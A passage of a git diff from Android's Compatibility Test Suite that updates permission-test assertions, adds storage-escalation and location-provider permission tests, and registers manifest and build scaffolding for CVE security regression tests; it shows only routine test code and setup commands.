ACCESS_BACKGROUND_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_ALLOWED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED)); } /** @@ -191,8 +191,8 @@ public class BackgroundPermissionsTest { // Wait until the system sets the app-op automatically // Fine location uses background location to limit access - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -208,8 +208,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_ALLOWED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED)); } /** @@ -225,8 +225,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_COARSE_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -244,7 +244,7 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_ALLOWED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED)); } } diff --git a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java index b53bf6a0cc4..5db94c1cffc 100644 --- a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java +++ b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java @@ -18,10 +18,8 @@ package android.permission.cts; import static android.Manifest.permission.ACCESS_BACKGROUND_LOCATION; import static android.Manifest.permission.ACCESS_COARSE_LOCATION; -import static android.Manifest.permission.ACCESS_MEDIA_LOCATION; import static android.Manifest.permission.READ_CALL_LOG; import static android.Manifest.permission.READ_CONTACTS; -import static android.Manifest.permission.READ_EXTERNAL_STORAGE; import static android.app.AppOpsManager.MODE_FOREGROUND; import static android.content.pm.PackageManager.FLAG_PERMISSION_REVIEW_REQUIRED; import static android.content.pm.PackageManager.FLAG_PERMISSION_USER_SET; @@ -37,6 +35,7 @@ import static android.permission.cts.PermissionUtils.uninstallApp; import static com.android.compatibility.common.util.SystemUtil.eventually; import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.assertEquals; @@ -118,7 +117,8 @@ public class SplitPermissionTest { * @param permName The permission that needs to be granted */ private void assertPermissionGranted(@NonNull String permName) throws Exception { - eventually(() -> assertThat(isGranted(APP_PKG, permName)).named(permName + " is granted").isTrue()); + eventually(() -> assertWithMessage(permName + " is granted").that( + isGranted(APP_PKG, permName)).isTrue()); } /** @@ -127,7 +127,7 @@ public class SplitPermissionTest { * @param permName The permission that should not be granted */ private void assertPermissionRevoked(@NonNull String permName) throws Exception { - assertThat(isGranted(APP_PKG, permName)).named(permName + " is granted").isFalse(); + assertWithMessage(permName + " is granted").that(isGranted(APP_PKG, permName)).isFalse(); } /** @@ -268,22 +268,6 @@ public class SplitPermissionTest { * If a permission was granted before the split happens, the new permission should inherit the * granted state. * - * This is a duplicate of {@link #inheritGrantedPermissionState} but for the storage permission - */ - @Test - public void inheritGrantedPermissionStateStorage() throws Exception { - install(APK_STORAGE_29); - grantPermission(APP_PKG, READ_EXTERNAL_STORAGE); - - install(APK_STORAGE_28); - - assertPermissionGranted(ACCESS_MEDIA_LOCATION); - } - - /** - * If a permission was granted before the split happens, the new permission should inherit the - * granted state. - * * <p>App using a shared uid */ @Test @@ -477,8 +461,8 @@ public class SplitPermissionTest { install(APK_LOCATION_BACKGROUND_29); - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named("foreground app-op") - .isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("foreground app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** diff --git a/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt new file mode 100644 index 00000000000..3e302a9b217 --- /dev/null +++ b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt @@ -0,0 +1,91 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission.cts + +import android.Manifest.permission.ACCESS_MEDIA_LOCATION +import android.Manifest.permission.READ_EXTERNAL_STORAGE +import android.Manifest.permission.WRITE_EXTERNAL_STORAGE +import android.app.Instrumentation +import android.app.UiAutomation +import android.content.Context +import android.content.pm.PackageManager +import androidx.test.platform.app.InstrumentationRegistry +import com.android.compatibility.common.util.SystemUtil +import org.junit.After +import org.junit.Assert +import org.junit.Before +import org.junit.Test + +class StorageEscalationTest { + companion object { + private const val APK_DIRECTORY = "/data/local/tmp/cts/permissions" + const val APP_APK_PATH_28 = "$APK_DIRECTORY/CtsStorageEscalationApp28.apk" + const val APP_APK_PATH_29_SCOPED = "$APK_DIRECTORY/CtsStorageEscalationApp29Scoped.apk" + const val APP_APK_PATH_29_FULL = "$APK_DIRECTORY/CtsStorageEscalationApp29Full.apk" + const val APP_PACKAGE_NAME = "android.permission3.cts.storageescalation" + const val DELAY_TIME_MS: Long = 200 + val permissions = listOf<String>(READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE, + ACCESS_MEDIA_LOCATION) + } + + private val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation() + private val context: Context = instrumentation.context + private val uiAutomation: UiAutomation = instrumentation.uiAutomation + + @Before + @After + fun uninstallApp() { + SystemUtil.runShellCommand("pm uninstall $APP_PACKAGE_NAME") + } + + private fun installPackage(apk: String) { + SystemUtil.runShellCommand("pm install -r $apk") + } + + private fun grantStoragePermissions() { + for (permName in permissions) { + uiAutomation.grantRuntimePermission(APP_PACKAGE_NAME, permName) + } + } + + private fun assertStoragePermissionState(granted: Boolean) { + for (permName in permissions) { + Assert.assertEquals(granted, context.packageManager.checkPermission(permName, + APP_PACKAGE_NAME) == PackageManager.PERMISSION_GRANTED) + } + } + + @Test + fun testCannotEscalateWithSdkDowngrade() { + runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_28) + } + + @Test + fun testCannotEscalateWithNewManifestLegacyRequest() { + runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_29_FULL) + } + + private fun runStorageEscalationTest(startPackageApk: String, finishPackageApk: String) { + installPackage(startPackageApk) + grantStoragePermissions() + assertStoragePermissionState(granted = true) + installPackage(finishPackageApk) + // permission revoke is async, so wait a short period + Thread.sleep(DELAY_TIME_MS) + assertStoragePermissionState(granted = false) + } +}
\ No newline at end of file diff --git a/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java b/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java index 1140cfba574..bb48193ee4b 100644 --- a/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java +++ b/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java @@ -20,7 +20,7 @@ import static android.content.pm.PermissionInfo.FLAG_INSTALLED; import static android.content.pm.PermissionInfo.PROTECTION_MASK_BASE; import static android.os.Build.VERSION.SECURITY_PATCH; -import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import android.content.Context; import android.content.pm.PackageInfo; @@ -235,7 +235,7 @@ public class PermissionPolicyTest { } // Fail on any offending item - assertThat(offendingList).named("list of offending permissions").isEmpty(); + assertWithMessage("list of offending permissions").that(offendingList).isEmpty(); } private List<ExpectedPermissionInfo> loadExpectedPermissions(int resourceId) throws Exception { diff --git a/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java b/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java index b44cfcbdf77..11e61213317 100644 --- a/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java +++ b/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java @@ -26,6 +26,7 @@ import static com.android.compatibility.common.util.SystemUtil.eventually; import static com.android.compatibility.common.util.SystemUtil.runShellCommand; import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.fail; @@ -490,7 +491,7 @@ public class RestrictedPermissionsTest { private void assertRestrictedPermissionWhitelisted( @NonNull Set<String> expectedWhitelistedPermissions) throws Exception { final PackageManager packageManager = getContext().getPackageManager(); - eventually(() -> runWithShellPermissionIdentity(() -> { + eventually(() -> runWithShellPermissionIdentity(() -> { final AppOpsManager appOpsManager = getContext().getSystemService(AppOpsManager.class); final PackageInfo packageInfo = packageManager.getPackageInfo(PKG, PackageManager.GET_PERMISSIONS); @@ -502,7 +503,7 @@ public class RestrictedPermissionsTest { | PackageManager.FLAG_PERMISSION_WHITELIST_UPGRADE); assertThat(whitelistedPermissions).isNotNull(); - assertThat(whitelistedPermissions).named("Whitelisted permissions") + assertWithMessage("Whitelisted permissions").that(whitelistedPermissions) .containsExactlyElementsIn(expectedWhitelistedPermissions); // Also assert that apps ops are properly set @@ -540,8 +541,8 @@ public class RestrictedPermissionsTest { } } - assertThat(appOpsManager.unsafeCheckOpRawNoThrow(op, - packageInfo.applicationInfo.uid, PKG)).named(op).isIn(possibleModes); + assertWithMessage(op).that(appOpsManager.unsafeCheckOpRawNoThrow(op, + packageInfo.applicationInfo.uid, PKG)).isIn(possibleModes); } })); } diff --git a/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java b/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java index 044abe257b9..5fb56e81d4d 100644 --- a/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java +++ b/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java @@ -28,7 +28,7 @@ import static com.android.compatibility.common.util.SystemUtil.eventually; import static com.android.compatibility.common.util.SystemUtil.runShellCommand; import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity; -import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static java.lang.Integer.min; @@ -99,8 +99,8 @@ public class RestrictedStoragePermissionSharedUidTest { * @param expectGranted {@code true} if the permission is expected to be granted */ void assertStoragePermGranted(boolean expectGranted) { - eventually(() -> assertThat(isGranted(mPkg, READ_EXTERNAL_STORAGE)).named( - this + " read storage granted").isEqualTo(expectGranted)); + eventually(() -> assertWithMessage(this + " read storage granted").that( + isGranted(mPkg, READ_EXTERNAL_STORAGE)).isEqualTo(expectGranted)); } /** @@ -112,11 +112,13 @@ public class RestrictedStoragePermissionSharedUidTest { eventually(() -> runWithShellPermissionIdentity(() -> { int uid = sContext.getPackageManager().getPackageUid(mPkg, 0); if (expectHasNotIsolatedStorage) { - assertThat(sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, - mPkg)).named(this + " legacy storage mode").isEqualTo(MODE_ALLOWED); + assertWithMessage(this + " legacy storage mode").that( + sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, + mPkg)).isEqualTo(MODE_ALLOWED); } else { - assertThat(sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, - mPkg)).named(this + " legacy storage mode").isNotEqualTo(MODE_ALLOWED); + assertWithMessage(this + " legacy storage mode").that( + sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, + mPkg)).isNotEqualTo(MODE_ALLOWED); } })); } diff --git a/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt b/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt index 26c6cc82bcf..c54a96c9201 100644 --- a/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt +++ b/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt @@ -56,6 +56,7 @@ import android.permission.PermissionManager import androidx.test.platform.app.InstrumentationRegistry import androidx.test.runner.AndroidJUnit4 import com.google.common.truth.Truth.assertThat +import com.google.common.truth.Truth.assertWithMessage import org.junit.Test import org.junit.runner.RunWith @@ -75,14 +76,14 @@ class RuntimePermissionProperties { platformRuntimePerms.filter { !platformBgPermNames.contains(it.name) } for (perm in platformFgPerms) { - assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNotNull() + assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNotNull() } } @Test fun groupOfRuntimePermissionsShouldBeUnknown() { for (perm in platformRuntimePerms) { - assertThat(perm.group).named("Group of ${perm.name}").isEqualTo(UNDEFINED) + assertWithMessage("Group of ${perm.name}").that(perm.group).isEqualTo(UNDEFINED) } } @@ -96,7 +97,7 @@ class RuntimePermissionProperties { } for (perm in platformAppOpPerms) { - assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNotNull() + assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNotNull() } } @@ -109,7 +110,7 @@ class RuntimePermissionProperties { platformRuntimePerms.filter { platformBgPermNames.contains(it.name) } for (perm in platformBgPerms) { - assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNull() + assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNull() } } diff --git a/tests/tests/permission3/Android.bp b/tests/tests/permission3/Android.bp index abedeefbee3..ffe42ad90cf 100644 --- a/tests/tests/permission3/Android.bp +++ b/tests/tests/permission3/Android.bp @@ -22,6 +22,7 @@ android_test { ], static_libs: [ "kotlin-stdlib", + "androidx.core_core", "androidx.test.rules", "compatibility-device-util-axt", "ctstestrunner-axt", @@ -37,6 +38,7 @@ android_test { ":CtsUsePermissionApp29", ":CtsUsePermissionAppLatest", ":CtsUsePermissionAppLatestWithBackground", + ":CtsUsePermissionAppLocationProvider", ":CtsUsePermissionAppWithOverlay", ], test_suites: [ diff --git a/tests/tests/permission3/AndroidTest.xml b/tests/tests/permission3/AndroidTest.xml index cdf7308d49c..23df08fddd5 100644 --- a/tests/tests/permission3/AndroidTest.xml +++ b/tests/tests/permission3/AndroidTest.xml @@ -43,6 +43,7 @@ <option name="push" value="CtsUsePermissionApp29.apk->/data/local/tmp/cts/permission3/CtsUsePermissionApp29.apk" /> <option name="push" value="CtsUsePermissionAppLatest.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppLatest.apk" /> <option name="push" value="CtsUsePermissionAppLatestWithBackground.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppLatestWithBackground.apk" /> + <option name="push" value="CtsUsePermissionAppLocationProvider.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppLocationProvider.apk" /> <option name="push" value="CtsUsePermissionAppWithOverlay.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppWithOverlay.apk" /> </target_preparer> diff --git a/tests/tests/permission3/UsePermissionAppLocationProvider/Android.bp b/tests/tests/permission3/UsePermissionAppLocationProvider/Android.bp new file mode 100644 index 00000000000..56c9966eee0 --- /dev/null +++ b/tests/tests/permission3/UsePermissionAppLocationProvider/Android.bp @@ -0,0 +1,31 @@ +// +// Copyright (C) 2021 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +package { + default_applicable_licenses: ["Android-Apache-2.0"], +} + +android_test_helper_app { + name: "CtsUsePermissionAppLocationProvider", + srcs: [ + ":CtsUsePermissionAppSrc", + "src/**/*.kt", + ], + static_libs: [ + "kotlin-stdlib", + ], + certificate: ":cts-testkey2", +} diff --git a/tests/tests/permission3/UsePermissionAppLocationProvider/AndroidManifest.xml b/tests/tests/permission3/UsePermissionAppLocationProvider/AndroidManifest.xml new file mode 100644 index 00000000000..16bacf56077 --- /dev/null +++ b/tests/tests/permission3/UsePermissionAppLocationProvider/AndroidManifest.xml @@ -0,0 +1,35 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2021 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.usepermission"> + + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> + + <application> + <activity android:name=".AddLocationProviderActivity" android:exported="true" /> + <activity android:name=".FinishOnCreateActivity" android:exported="true" + android:permission="android.permission.START_VIEW_PERMISSION_USAGE"> + <intent-filter> + <action android:name="android.intent.action.VIEW_PERMISSION_USAGE"/> + <category android:name="android.intent.category.DEFAULT"/> + </intent-filter> + </activity> + </application> +</manifest> diff --git a/tests/tests/permission3/UsePermissionAppLocationProvider/src/android/permission3/cts/usepermission/AddLocationProviderActivity.kt b/tests/tests/permission3/UsePermissionAppLocationProvider/src/android/permission3/cts/usepermission/AddLocationProviderActivity.kt new file mode 100644 index 00000000000..3bb461cbba7 --- /dev/null +++ b/tests/tests/permission3/UsePermissionAppLocationProvider/src/android/permission3/cts/usepermission/AddLocationProviderActivity.kt @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission3.cts.usepermission + +import android.app.Activity +import android.location.Criteria +import android.location.LocationManager +import android.os.Bundle + +/** + * An activity that adds this package as a test location provider. + */ +class AddLocationProviderActivity : Activity() { + override fun onCreate(savedInstanceState: Bundle?) { + super.onCreate(savedInstanceState) + + val locationManager = getSystemService(LocationManager::class.java) + locationManager.addTestProvider( + packageName, false, false, false, false, false, false, false, Criteria.POWER_LOW, + Criteria.ACCURACY_COARSE + ) + + setResult(RESULT_OK) + finish() + } +} diff --git a/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt b/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt index bea7a1629c1..6a8c51247ec 100644 --- a/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt +++ b/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt @@ -53,6 +53,8 @@ abstract class BaseUsePermissionTest : BasePermissionTest() { const val APP_APK_PATH_LATEST = "$APK_DIRECTORY/CtsUsePermissionAppLatest.apk" const val APP_APK_PATH_LATEST_WITH_BACKGROUND = "$APK_DIRECTORY/CtsUsePermissionAppLatestWithBackground.apk" + const val APP_APK_PATH_LOCATION_PROVIDER = + "$APK_DIRECTORY/CtsUsePermissionAppLocationProvider.apk" const val APP_APK_PATH_WITH_OVERLAY = "$APK_DIRECTORY/CtsUsePermissionAppWithOverlay.apk" const val APP_PACKAGE_NAME = "android.permission3.cts.usepermission" diff --git a/tests/tests/permission3/src/android/permission3/cts/PermissionUsageInfoTest.kt b/tests/tests/permission3/src/android/permission3/cts/PermissionUsageInfoTest.kt new file mode 100644 index 00000000000..fcfb5fdc3cd --- /dev/null +++ b/tests/tests/permission3/src/android/permission3/cts/PermissionUsageInfoTest.kt @@ -0,0 +1,113 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission3.cts + +import android.app.Activity +import android.app.AppOpsManager +import android.content.ComponentName +import android.content.Intent +import android.location.LocationManager +import android.support.test.uiautomator.By +import androidx.core.os.BuildCompat +import com.android.compatibility.common.util.AppOpsUtils.setOpMode +import com.android.compatibility.common.util.SystemUtil.callWithShellPermissionIdentity +import com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity +import org.junit.After +import org.junit.Assert.assertEquals +import org.junit.Assert.assertTrue +import org.junit.Assume.assumeTrue +import org.junit.Before +import org.junit.Test +import java.util.concurrent.TimeUnit + +/** + * Tests permission usage info action for location providers. + */ +class PermissionUsageInfoTest : BaseUsePermissionTest() { + val locationManager = context.getSystemService(LocationManager::class.java)!! + + @Before + fun installAppLocationProviderAndAllowMockLocation() { + installPackage(APP_APK_PATH_LOCATION_PROVIDER) + // The package name of a mock location provider is the caller adding it, so we have to let + // the test app add itself. + setOpMode(APP_PACKAGE_NAME, AppOpsManager.OPSTR_MOCK_LOCATION, AppOpsManager.MODE_ALLOWED) + } + + @Before + fun allowMockLocation() { + // Allow ourselves to reliably remove the test location provider. + setOpMode( + context.packageName, AppOpsManager.OPSTR_MOCK_LOCATION, AppOpsManager.MODE_ALLOWED + ) + } + + @After + fun removeTestLocationProvider() { + locationManager.removeTestProvider(APP_PACKAGE_NAME) + } + + @Test + fun testLocationProviderPermissionUsageInfo() { + val locationProviderPackageName: String + if (BuildCompat.isAtLeastS()) { + // Add the test app as location provider. + val future = startActivityForFuture( + Intent().apply { + component = ComponentName( + APP_PACKAGE_NAME, "$APP_PACKAGE_NAME.AddLocationProviderActivity" + ) + } + ) + val result = future.get(TIMEOUT_MILLIS, TimeUnit.MILLISECONDS) + assertEquals(Activity.RESULT_OK, result.resultCode) + assertTrue( + callWithShellPermissionIdentity { + locationManager.isProviderPackage(APP_PACKAGE_NAME) + } + ) + locationProviderPackageName = APP_PACKAGE_NAME + } else { + // Test location provider doesn't count as location provier package before S. + val locationManager = context.getSystemService(LocationManager::class.java)!! + locationProviderPackageName = packageManager.getInstalledApplications(0) + .map { it.packageName } + .filter { + callWithShellPermissionIdentity { locationManager.isProviderPackage(it) } + } + .firstOrNull { + Intent(Intent.ACTION_VIEW_PERMISSION_USAGE) + .setPackage(it) + .resolveActivity(packageManager) != null + } + .let { + assumeTrue(it != null) + it!! + } + } + + runWithShellPermissionIdentity { + context.startActivity( + Intent(Intent.ACTION_MANAGE_APP_PERMISSIONS).apply { + putExtra(Intent.EXTRA_PACKAGE_NAME, locationProviderPackageName) + addFlags(Intent.FLAG_ACTIVITY_NEW_TASK) + } + ) + } + click(By.res("com.android.permissioncontroller:id/icon")) + } +} diff --git a/tests/tests/role/Android.bp b/tests/tests/role/Android.bp index bb35032e926..c3545b716f0 100644 --- a/tests/tests/role/Android.bp +++ b/tests/tests/role/Android.bp @@ -32,7 +32,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-permission", ], data: [ diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp index e82f2e1a677..743ea88c00c 100644 --- a/tests/tests/security/Android.bp +++ b/tests/tests/security/Android.bp @@ -54,6 +54,7 @@ android_test { "src/**/*.java", "src/android/security/cts/activity/ISecureRandomService.aidl", "aidl/android/security/cts/IIsolatedService.aidl", + "aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl", ], //sdk_version: "current", platform_apis: true, diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml index a8cf61ad62b..31f4c59d79a 100644 --- a/tests/tests/security/AndroidManifest.xml +++ b/tests/tests/security/AndroidManifest.xml @@ -121,6 +121,52 @@ </intent-filter> </activity> + <activity android:name="android.security.cts.CVE_2021_0327.IntroActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.OtherUserActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.TestActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.workprofilesetup.ProvisionedActivity"> + <intent-filter> + <action android:name="android.app.action.PROVISIONING_SUCCESSFUL" /> + <category android:name="android.intent.category.DEFAULT" /> + </intent-filter> + </activity> + + <receiver + android:name="android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver" + android:permission="android.permission.BIND_DEVICE_ADMIN"> + <meta-data + android:name="android.app.device_admin" + android:resource="@xml/device_admin" /> + <intent-filter> + <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> + </intent-filter> + </receiver> + + <provider + android:name="android.security.cts.CVE_2021_0327.BadProvider" + android:authorities="android.security.cts.CVE_2021_0327.BadProvider" + android:exported="false" + android:grantUriPermissions="true" + android:process=":badprovider" /> + </application> <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner" diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml index a7d1edeaeb8..6e0c8bc4f69 100644 --- a/tests/tests/security/AndroidTest.xml +++ b/tests/tests/security/AndroidTest.xml @@ -17,7 +17,8 @@ <option name="test-suite-tag" value="cts" /> <option name="config-descriptor:metadata" key="component" value="security" /> <option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" /> - <option name="config-descriptor:metadata" key="parameter" value="instant_app" /> + <!-- CtsDeviceInfo target API is 23; instant app requires target API >= 26. --> + <option name="config-descriptor:metadata" key="parameter" value="not_instant_app" /> <option name="config-descriptor:metadata" key="parameter" value="secondary_user" /> <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> @@ -33,6 +34,16 @@ value="appops reset android.security.cts" /> </target_preparer> + <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> + <option name="teardown-command" + value="pm remove-user 10" /> + </target_preparer> + + <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> + <option name="teardown-command" + value="pm uninstall --user 0 android.security.cts" /> + </target_preparer> + <test class="com.android.tradefed.testtype.AndroidJUnitTest" > <option name="package" value="android.security.cts" /> <option name="runtime-hint" value="1h40m18s" /> diff --git a/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl new file mode 100644 index 00000000000..e71f2c8fc0d --- /dev/null +++ b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl @@ -0,0 +1,10 @@ +// IBadProvider.aidl +package android.security.cts.CVE_2021_0327; + +// Declare any non-default types here with import statements +import android.os.ParcelFileDescriptor; +interface IBadProvider { + ParcelFileDescriptor takeBinder(); + + oneway void exit(); +} diff --git a/tests/tests/security/jni/Android.bp b/tests/tests/security/jni/Android.bp index b667f18252b..60f934869c7 100644 --- a/tests/tests/security/jni/Android.bp +++ b/tests/tests/security/jni/Android.bp @@ -20,6 +20,7 @@ cc_library { "android_security_cts_NativeCodeTest.cpp", "android_security_cts_MMapExecutableTest.cpp", "android_security_cts_EncryptionTest.cpp", + "android_security_cts_cve_2021_0394.cpp", ], shared_libs: [ "libcrypto", diff --git a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp index 7490d1ad37e..06e57f18930 100644 --- a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp +++ b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp @@ -22,6 +22,7 @@ extern int register_android_security_cts_NativeCodeTest(JNIEnv*); extern int register_android_security_cts_SeccompTest(JNIEnv*); extern int 